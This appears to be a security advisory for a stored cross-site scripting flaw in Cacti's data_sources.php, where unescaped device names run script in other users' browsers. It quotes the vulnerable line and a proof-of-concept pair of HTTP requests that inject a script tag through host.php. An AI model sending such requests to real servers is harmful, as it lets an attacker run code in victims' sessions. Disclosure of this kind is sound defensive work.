Stored Cross-site Scripting on data_sources.php device name view in Cacti

An authenticated user with 'General Administration>Sites/Devices/Data' permissions can configure a malicious device name via `host.php`. This malicious data is then rendered on the `data_sources.php` page, executing JavaScript in the browser of any user viewing that page with equivalent or higher privileges. The payload is injected into the 'device name' field, which is then displayed without proper sanitization.

The vulnerability is located in the `data_sources.php` script, specifically at line 866 where the `$name` variable, representing the device name, is printed without proper escaping. The code snippet provided is: `<span class='linkMarker'>*</span><a class='hyperLink' href='<?php print html_escape('graphs.php?action=graph_edit&id=' . $id['local_graph_id']);?>'><?php print __('Edit Graph: ', $name);?></a>` [ref_id=1].

The advisory recommends either treating the user-supplied information as plain text or escaping the content using HTML entities before rendering. This prevents the injected JavaScript from being interpreted as executable code by the browser. Users unable to upgrade to version 1.2.25 are advised to manually filter HTML output.

POST /cacti/host.php?header=false HTTP/1.1 Host: <HOST> Content-Length: 739 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://{HOST} Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <COOKIE> Connection: close

__csrf_magic=<TOKEN>&description=%3Cscript%3Ealert('malicious+code+in+device+name')%3C%2Fscript%3E&hostname=localhost&location=&poller_id=1&site_id=1&host_template_id=1&device_threads=1&snmp_version=2&snmp_community=public&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=-1&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1&notes=&external_id=&id=4&save_component_host=1&graph_template_id=26&snmp_query_id=5&reindex_method=1&action=save

GET /cacti/data_sources.php?action=ds_edit&id=39 HTTP/1.1 Host: <HOST> Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <COOKIE> Connection: close [ref_id=1]